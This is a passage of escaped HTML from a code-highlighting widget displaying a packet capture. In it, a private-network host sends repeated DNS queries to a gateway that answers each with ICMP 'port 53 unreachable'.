data-line=\"crayon-598a38e8ac96b002262104-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-38\">38<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-1\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">42.963917<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-2\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.955685<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.37895<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-3\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.955754<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-4\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956251<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.51733<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-5\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956282<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-6\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956797<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.52958<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-7\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.956821<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-8\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.957639<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.49007<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-9\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.957660<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-10\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.958327<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.42641<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-11\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.958351<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-12\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.958837<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.36077<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-13\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.958857<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-14\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.965678<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.49884<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-15\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.965704<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-16\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.969792<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.53144<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-17\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.969820<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-18\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.970305<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.32949<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-19\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.970326<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-20\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.970971<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.48094<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-21\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.970993<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-22\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.971505<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.52246<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-23\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.971516<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp 